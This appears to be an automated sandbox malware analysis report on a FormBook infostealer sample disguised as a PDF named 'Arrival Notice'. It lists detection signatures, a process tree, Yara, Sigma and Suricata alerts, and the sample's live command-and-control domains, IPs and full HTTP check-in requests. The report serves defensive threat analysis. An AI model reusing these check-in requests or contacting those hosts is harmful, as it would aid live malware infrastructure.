Edit tour

Windows Analysis Report
Arrival Notice_pdf.exe

Overview

General Information

Sample name:	Arrival Notice_pdf.exe
Analysis ID:	1557320
MD5:	1ff21e9055f0e4e51b6061abbdb371c5
SHA1:	ba16eb2d6cc767667b60fd408b2aaadb9291970b
SHA256:	a949711a2548287c4da624ebf136e41df1deba6b67783bf3dc3a30fded99d12c
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Arrival Notice_pdf.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\Arrival Notice_pdf.exe" MD5: 1FF21E9055F0E4E51B6061ABBDB371C5)

svchost.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\Arrival Notice_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

FMQUqumqqHn.exe (PID: 4248 cmdline: "C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

srdelayed.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)

ktmutil.exe (PID: 7892 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)

FMQUqumqqHn.exe (PID: 4040 cmdline: "C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 8092 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3007895884.00000000037C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2109435609.00000000039B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3007811808.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2109156869.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3006361628.00000000032A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3009849528.0000000004F10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3007851099.00000000029A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2109766893.0000000004200000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice_pdf.exe, ParentProcessId: 7500, ParentProcessName: Arrival Notice_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", ProcessId: 7552, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice_pdf.exe, ParentProcessId: 7500, ParentProcessName: Arrival Notice_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice_pdf.exe", ProcessId: 7552, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T03:22:59.099074+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-18T03:23:22.653490+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49871	3.33.130.190	80	TCP
2024-11-18T03:23:36.255587+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49951	203.161.49.193	80	TCP
2024-11-18T03:23:50.272002+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50014	3.33.130.190	80	TCP
2024-11-18T03:24:03.582753+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50018	3.33.130.190	80	TCP
2024-11-18T03:24:17.430311+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50022	198.252.98.54	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T03:22:59.099074+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-18T03:23:22.653490+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49871	3.33.130.190	80	TCP
2024-11-18T03:23:36.255587+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49951	203.161.49.193	80	TCP
2024-11-18T03:23:50.272002+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50014	3.33.130.190	80	TCP
2024-11-18T03:24:03.582753+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50018	3.33.130.190	80	TCP
2024-11-18T03:24:17.430311+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50022	198.252.98.54	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T03:23:14.937949+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49829	3.33.130.190	80	TCP
2024-11-18T03:23:17.489974+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49844	3.33.130.190	80	TCP
2024-11-18T03:23:20.041312+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49856	3.33.130.190	80	TCP
2024-11-18T03:23:28.614828+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49905	203.161.49.193	80	TCP
2024-11-18T03:23:31.146088+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49919	203.161.49.193	80	TCP
2024-11-18T03:23:33.708603+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49935	203.161.49.193	80	TCP
2024-11-18T03:23:42.141040+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49982	3.33.130.190	80	TCP
2024-11-18T03:23:44.744497+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49996	3.33.130.190	80	TCP
2024-11-18T03:23:47.659781+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50007	3.33.130.190	80	TCP
2024-11-18T03:23:55.964091+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50015	3.33.130.190	80	TCP
2024-11-18T03:23:58.560099+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50016	3.33.130.190	80	TCP
2024-11-18T03:24:01.063135+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50017	3.33.130.190	80	TCP
2024-11-18T03:24:09.346163+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	198.252.98.54	80	TCP
2024-11-18T03:24:11.896249+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	198.252.98.54	80	TCP
2024-11-18T03:24:14.860685+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	198.252.98.54	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Arrival Notice_pdf.exe	ReversingLabs: Detection: 26%
Source: Arrival Notice_pdf.exe	Virustotal: Detection: 21%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3007895884.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109435609.00000000039B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3007811808.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109156869.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3006361628.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3009849528.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3007851099.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109766893.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Arrival Notice_pdf.exe

Joe Sandbox ML: detected

Source: Arrival Notice_pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FMQUqumqqHn.exe, 00000005.00000002.3006363312.00000000004FE000.00000002.00000001.01000000.00000005.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2191029645.00000000004FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Arrival Notice_pdf.exe, 00000000.00000003.1784335929.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice_pdf.exe, 00000000.00000003.1784514568.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2008747039.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012567334.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3008423846.0000000003D1E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3008423846.0000000003B80000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2123552604.00000000039D1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2121605069.000000000382E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Arrival Notice_pdf.exe, 00000000.00000003.1784335929.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice_pdf.exe, 00000000.00000003.1784514568.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2008747039.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109463258.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012567334.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000007.00000002.3008423846.0000000003D1E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3008423846.0000000003B80000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2123552604.00000000039D1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000003.2121605069.000000000382E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000001.00000002.2109318956.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109304919.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000002.3007133802.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdb source: svchost.exe, 00000001.00000002.2109318956.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2109304919.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000002.3007133802.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ktmutil.exe, 00000007.00000002.3006642463.0000000003543000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3009265180.00000000041AC000.00000004.10000000.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2192129753.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.000000003850C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ktmutil.exe, 00000007.00000002.3006642463.0000000003543000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000007.00000002.3009265180.00000000041AC000.00000004.10000000.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2192129753.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.000000003850C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00286CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00286CA9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_002860DD
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_002863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_002863F9
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0028EB60
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028F56F FindFirstFileW,FindClose,	0_2_0028F56F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0028F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0028F5FA
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00291B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291B2F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00291C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291C8A
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00291F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00291F94
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 7_2_032BC810 FindFirstFileW,FindNextFileW,FindClose,	7_2_032BC810

Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then xor eax, eax	7_2_032A9F20
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then pop edi	7_2_032AE50B
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_038D04DF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49737 -> 154.92.61.37:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 154.92.61.37:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49871 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49871 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49905 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49829 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49919 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49856 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49844 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49951 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49951 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49982 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50014 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49996 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 198.252.98.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 198.252.98.54:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.huiguang.xyz
Source:	DNS query: www.huiguang.xyz
Source:	DNS query: www.schedulemassage.xyz

Source: Joe Sandbox View

IP Address: 203.161.49.193 203.161.49.193

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: HAWKHOSTCA HAWKHOSTCA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00294EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00294EB5

Source: global traffic	HTTP traffic detected: GET /hv6g/?p2J=sbJxX&XRWLl=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /79tr/?XRWLl=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&p2J=sbJxX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /hxmz/?p2J=sbJxX&XRWLl=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /slxp/?XRWLl=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&p2J=sbJxX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0598/?XRWLl=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&p2J=sbJxX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
